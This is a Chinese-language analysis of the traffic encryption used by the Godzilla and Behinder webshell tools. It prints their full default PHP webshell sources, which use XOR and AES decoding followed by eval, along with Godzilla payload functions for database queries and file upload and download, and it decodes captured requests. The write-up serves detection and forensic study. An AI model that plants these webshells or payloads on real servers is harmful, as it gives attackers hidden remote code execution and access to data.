@pg_set_client_encoding($T,$charset); } $q=@pg_query($T$sql); if(!$q){ return @pg_last_error(); }else$n=@pg_num_fields($q); if($n===NULL){ return @pg_last_error(); }elseif($n===0){ return "Query OK, ".@pg_affected_rows($q)." rows affected"; }else$data = "ok\n"for($i=0;$i<$n;$i++){ $data.=base64_encode(@pg_field_name($q,$i))."\t"; } $data.= "\n"while($row=@pg_fetch_row($q)){ for($i=0;$i<$n;$i++){ $data.=base64_encode($row[$i]!==NULL?$row[$i]:"NULL")."\t"; } $data.= "\n"; } return $data; } } } } function sqlsrv_exec($host$port$username$password$execType$currentDb,$sql){ $dbConfig=array("UID"=> $username,"PWD"=>$password); if (!empty($currentDb)){ $dbConfig["Database"]=$currentDb; } $T=@sqlsrv_connect($host,$dbConfig); $q=@sqlsrv_query($T,$sql,null); if($q!==false){ $i=0$fm=@sqlsrv_field_metadata($q); if(empty($fm)){ $ar=@sqlsrv_rows_affected($q); return "Query OK, ".$ar." rows affected"; }else$data = "ok\n"foreach($fm as $rs){ $data.=base64_encode($rs['Name'])."\t"$i++; } $data.= "\n"while($rs=@sqlsrv_fetch_array($q,SQLSRV_FETCH_NUMERIC)){ for($c=0;$c<$i;$c++){ $data.=base64_encode(trim($rs[$c]))."\t"; } $data.= "\n"; } return $data; } }else$err=""if(($e = sqlsrv_errors()) != null){ foreach($e as $v){ $err.=($e['message'])."\n"; } } return $err; } } function mssql_exec($host$port$username$password$execType,$currentDb$sql){ $T=@mssql_connect($host,$username,$password); if (!empty($currentDb)){ @mssql_select_db($currentDb); } $q=@mssql_query($sql,$T); if(is_bool($q)){ return "Query OK, ".@mssql_rows_affected($T)." rows affected"; }else$data = "ok\n"$i=0while($rs=@mssql_fetch_field($q)){ $data.=base64_encode($rs->name)."\t"$i++; } $data.="\n"while($rs=@mssql_fetch_row($q)){ for($c=0;$c<$i;$c++){ $data.=base64_encode(trim($rs[$c]))."\t"; } $data.="\n"; } @mssql_free_result($q); @mssql_close($T); return $data; } } function oci_exec($host$port$username$password$execType$currentDb$sql$charset) { $chs = $charset ? $charset : "utf8"$mod = 0$H = @oci_connect($username$password$host$chs$mod); if (!$H) { $errObj=@oci_error(); return $errObj["message"]; } else { $q = @oci_parse($H$sql); if (@oci_execute($q)) { $n = oci_num_fields($q); if ($n == 0) { return "Query OK, ".@oci_num_rows($q)." rows affected"; } else { $data = "ok\n"for ($i = 1$i <= $n$i++) { $data.= base64_encode(oci_field_name($q$i))."\t"; } $data.= "\n"while ($row = @oci_fetch_array($q, OCI_ASSOC + OCI_RETURN_NULLS)) { foreach($row as $item) { $data.= base64_encode($item !== null ? base64_encode($item) : ""). "\t"; } $data.= "\n"; } return $data; } } else { $e = @oci_error($q); if ($e) { return "ERROR://{$e['message']} in [{$e['sqltext']}] col:{$e['offset']}"; } else { return "false"; } } } } function ora_exec($host$port$username$password$execType$currentDb$sql$charset) { $H = @ora_plogon("{$username}@{$host}""{$password}"); if (!$H) { return "Login Failed!"; } else { $T = @ora_open($H); @ora_commitoff($H); $q = @ora_parse($T"{$sql}"); $R = ora_exec($T); if ($R) { $n = ora_numcols($T); $data="ok\n"for ($i = 0$i < $n$i++) { $data.=base64_encode(Ora_ColumnName($T$i))."\t"; } $data.="\n"while (ora_fetch($T)) { for ($i = 0$i < $n$i++) { $data.=base64_encode(trim(ora_getcolumn($T$i)))."\t"; } $data.="\n"; } return $data; } else { return "false"; } } } function sqlite_exec($host$port$username$password$execType$currentDb$sql$charset) { $dbh=new SQLite3($host); if(!$dbh){ return "ERROR://CONNECT ERROR".SQLite3::lastErrorMsg(); }else$stmt=$dbh->prepare($sql); if(!$stmt){ return "ERROR://".$dbh->lastErrorMsg(); } else { $result=$stmt->execute(); if(!$result){ return $dbh->lastErrorMsg(); }else$bool=True; $data="ok\n"while($res=$result->fetchArray(SQLITE3_ASSOC)){ if($bool){ foreach($res as $key=>$value){ $data.=base64_encode($key)."\t"; } $bool=False; $data.="\n"; } foreach($res as $key=>$value){ $data.=base64_encode($value!==NULL?$value:"NULL")."\t"; } $data.="\n"; } if($bool){ if(!$result->numColumns()){ return "Query OK, ".$dbh->changes()." rows affected"; }elsereturn "ERROR://Table is empty."; } }elsereturn $data; } } } $dbh->close(); } } function pdoExec($databaseType,$host,$port,$username,$password,$execType,$currentDb,$sql){ $conn=null; if ($databaseType==="oracle"){ $databaseType="orcl"; } if (strpos($host,"=")!==false){ $conn = new PDO($host$username$password); }else if (!empty($currentDb)){ $conn = new PDO("{$databaseType}:host=$host;port={$port};dbname={$currentDb}"$username$password); }else$conn = new PDO("{$databaseType}:host=$host;port={$port};"$username$password); } $conn->setAttribute(30); if ($execType=="update"){ $affectRows=$conn->exec($sql); if ($affectRows!==false){ return "Query OK, ".$conn->exec($sql)." rows affected"; }elsereturn "Err->\n".implode(',',$conn->errorInfo()); } }else$data="ok\n"$stm=$conn->prepare($sql); if ($stm->execute()){ $row=$stm->fetch(2); $_row="\n"foreach (array_keys($row) as $key){ $data.=base64_encode($key)."\t"$_row.=base64_encode($row[$key])."\t"; } $data.=$_row."\n"while ($row=$stm->fetch(2)){ foreach (array_keys($row) as $key){ $data.=base64_encode($row[$key])."\t"; } $data.="\n"; } return $data; }elsereturn "Err->\n".implode(',',$stm->errorInfo()); } } } if ($dbType=="mysql"&&(class_exists("mysqli")||function_existsEx("mysql_connect")||function_existsEx("mysqli_connect"))){ if (class_exists("mysqli")){ return mysqli_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); }elseif (function_existsEx("mysql_connect")){ return mysql_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); }else if (function_existsEx("mysqli_connect")){ return mysqliEx_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); } }elseif ($dbType=="postgresql"&&function_existsEx("pg_connect")){ if (function_existsEx("pg_connect")){ return pg_execEx($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); } }elseif ($dbType=="sqlserver"&&(function_existsEx("sqlsrv_connect")||function_existsEx("mssql_connect"))){ if (function_existsEx("sqlsrv_connect")){ return sqlsrv_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql); }elseif (function_existsEx("mssql_connect")){ return mssql_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql); } }elseif ($dbType=="oracle"&&(function_existsEx("oci_connect")||function_existsEx("ora_plogon"))){ if (function_existsEx("oci_connect")){ return oci_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); }else if (function_existsEx("ora_plogon")){ return oci_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); } }elseif ($dbType=="sqlite"&&class_exists("SQLite3")){ return sqlite_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); } if (extension_loaded("pdo")){ return pdoExec($dbType,$dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql); }elsereturn "no extension"; } } function base64Encode($data){ return base64_encode($data); } function test(){ return "ok"; } function get($key){ global $parametersif (isset($parameters[$key])){ return $parameters[$key]; }elsereturn null; } } function getAllParameters(){ global $parametersreturn $parameters; } function includeCode(){ $classCode=get("binCode"); $codeName=get("codeName"); $_SES=&getSession(); $_SES[$codeName]=$classCodereturn "ok"; } function base64Decode($string){ return base64_decode($string); } function convertFilePermissions($fileAttr){ $mod=0if (strpos($fileAttr,'R')!==false){ $mod=$mod+0444; } if (strpos($fileAttr,'W')!==false){ $mod=$mod+0222; } if (strpos($fileAttr,'X')!==false){ $mod=$mod+0111; } return $mod; } function g_close(){ @session_start(); $_SES=&getSession(); $_SES=null; if (@session_destroy()){ return "ok"; }elsereturn "fail!"; } } function bigFileDownload(){ $mode=get("mode"); $fileName=get("fileName"); $readByteNum=get("readByteNum"); $position=get("position"); if ($mode=="fileSize"){ return @filesize($fileName).""; }elseif ($mode=="read"){ if (function_existsEx("fopen")&&function_existsEx("fread")&&function_existsEx("fseek")){ $handle=fopen($fileName,"rb"); if ($handle!==false){ @fseek($handle,$position); $data=fread($handle,$readByteNum); @fclose($handle); if ($data!==false){ return $data; }elsereturn "cannot read file"; } }elsereturn "cannot open file"; } }else if (function_existsEx("file_get_contents")){ return file_get_contents($fileName,false,null,$position,$readByteNum); }elsereturn "no function"; } }elsereturn "no mode"; } } function bigFileUpload(){ $fileName=get("fileName"); $fileContents=get("fileContents"); $position=get("position"); if(function_existsEx("fopen")&&function_existsEx("fwrite")&&function_existsEx("fseek")){ $handle=fopen($fileName,"ab"); if ($handle!==false){ fseek($handle,$position); $len=fwrite($handle,$fileContents); @fclose($handle); if ($len!==false){ return "ok"; }elsereturn "cannot write file"; } }elsereturn "cannot open file"; } }else if (function_existsEx("file_put_contents")){ if (file_put_contents($fileName,$fileContents,FILE_APPEND)!==false){ return "ok"; }elsereturn "writer fail"; } }elsereturn "no function"; } } function canCallGzipEncode(){ if (function_existsEx("gzencode")){ return "1"; }elsereturn "0"; } } function canCallGzipDecode(){ if (function_existsEx("gzdecode")){ return "1"; }elsereturn "0"; } } function bytesToInteger($bytes$position) { $val = 0$val = $bytes[$position + 3] & 0xff; $val <<= 8$val |= $bytes[$position + 2] & 0xff; $val <<= 8$val |= $bytes[$position + 1] & 0xff; $val <<= 8$val |= $bytes[$position] & 0xff; return $val; } function isGzipStream($bin){ if (strlen($bin)>=2){ $bin=substr($bin,0,2); $strInfo = @unpack("C2chars"$bin); $typeCode = intval($strInfo['chars1'].$strInfo['chars2']); switch ($typeCode) { case 31139return true; default: return false; } }elsereturn false; } } function getBytes($string) { $bytes = array(); for($i = 0$i < strlen($string); $i++){ array_push($bytes,ord($string[$i])); } return $bytes; }

内容包含了文件操作、执行命令等诸多模块,方便后续调用。

PHP_EVEAL_XOR_BASE64

这个shell脚本并无特别,一句话脚本上传即可。在流上与PHP_XOR_BASE64上的区别很明显,PHP_XOR_BASE64是key=加密,PHP_EVEAL_XOR_BASE64是pass=加密&key=加密,那么我们需要考虑的部分在于pass后面跟了什么内容由流可得:

pass=eval%28base64_decode%28strrev%28urldecode%28%27
url解码:
pass=eval(base64_decode(strrev(urldecode('

即是这段加密信息解密的方法:

K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD

将加密url解密后:

K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD

再将代码逆序排列:

DQpAc2Vzc2lvbl9zdGFydCgpOw0KQHNldF90aW1lX2xpbWl0KDApOw0KQGVycm9yX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIGVuY29kZSgkRCwkSyl7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7DQogICAgICAgICRjID0gJEtbJGkrMSYxNV07DQogICAgICAgICREWyRpXSA9ICREWyRpXV4kYzsNCiAgICB9DQogICAgcmV0dXJuICREOw0KfQ0KJHBhc3M9J2tleSc7DQokcGF5bG9hZE5hbWU9J3BheWxvYWQnOw0KJGtleT0nM2M2ZTBiOGE5YzE1MjI0YSc7DQppZiAoaXNzZXQoJF9QT1NUWyRwYXNzXSkpew0KICAgICRkYXRhPWVuY29kZShiYXNlNjRfZGVjb2RlKCRfUE9TVFskcGFzc10pLCRrZXkpOw0KICAgIGlmIChpc3NldCgkX1NFU1NJT05bJHBheWxvYWROYW1lXSkpew0KICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7DQogICAgICAgIGlmIChzdHJwb3MoJHBheWxvYWQsImdldEJhc2ljc0luZm8iKT09PWZhbHNlKXsNCiAgICAgICAgICAgICRwYXlsb2FkPWVuY29kZSgkcGF5bG9hZCwka2V5KTsNCiAgICAgICAgfQ0KCQlldmFsKCRwYXlsb2FkKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDAsMTYpOw0KICAgICAgICBlY2hvIGJhc2U2NF9lbmNvZGUoZW5jb2RlKEBydW4oJGRhdGEpLCRrZXkpKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDE2KTsNCiAgICB9ZWxzZXsNCiAgICAgICAgaWYgKHN0cnBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2Upew0KICAgICAgICAgICAgJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV09ZW5jb2RlKCRkYXRhLCRrZXkpOw0KICAgICAgICB9DQogICAgfQ0KfQ0K

然后再base64解码:


@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
  for($i=0;$i<strlen($D);$i++) {
    $c = $K[$i+1&15];
    $D[$i] = $D[$i]^$c;
  }
  return $D;
}
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
  $data=encode(base64_decode($_POST[$pass]),$key);
  if (isset($_SESSION[$payloadName])){
    $payload=encode($_SESSION[$payloadName],$key);
    if (strpos($payload,"getBasicsInfo")===false){
      $payload=encode($payload,$key);
    }
    eval($payload);
    echo substr(md5($pass.$key),0,16);
    echo base64_encode(encode(@run($data),$key));
    echo substr(md5($pass.$key),16);
  }else{
    if (strpos($data,"getBasicsInfo")!==false){
      $_SESSION[$payloadName]=encode($data,$key);
    }
  }
}

即是PHP_XOR_BASE64的默认shell,至于后面key的编码和PHP_XOR_BASE64解密方法一致,可参考上面小节。

PHP_XOR_RAW

对应的默认木马文件:

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
    $data=encode($data,$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo encode(@run($data),$key);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

这里根据shell可以得到 解密过程更简单一点,但它需要提取二进制数据进行解密,直接用wireshark有点麻烦就在哥斯拉的shell里添了:

$b = file_put_contents('raw.txt'$data);

将二进制文本存了下来,然后直接读取解密:

<?php 
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';

$file_path = "raw.txt";
if (file_exists($file_path)) {
    $fp = fopen($file_path"r");
    $post = fread($fp, filesize($file_path));
    $post = str_replace("\r\n""
"
$post);
}

#$post = "";

#echo base64_decode($post);
echo "<br/>";
echo "<br/>";

#$data=encode(base64_decode($post),$key);
$data=encode(($post),$key);
echo $data;

冰蝎3.0

这里还是以php为例,默认shell如下:

<?php
@error_reporting(0);
session_start();
    $key="a02439ec229d8be0"//该密钥为连接密码32位md5值的前16位,默认连接密码POST
    $_SESSION['k']=$key;
    session_write_close();
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post"AES128"$key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

由shell可得冰蝎所进行ase加密的恶意代码,这里解密需要密钥,而密钥是由设置连接密码32位md5加密的前16位组成,整体解法并不复杂。

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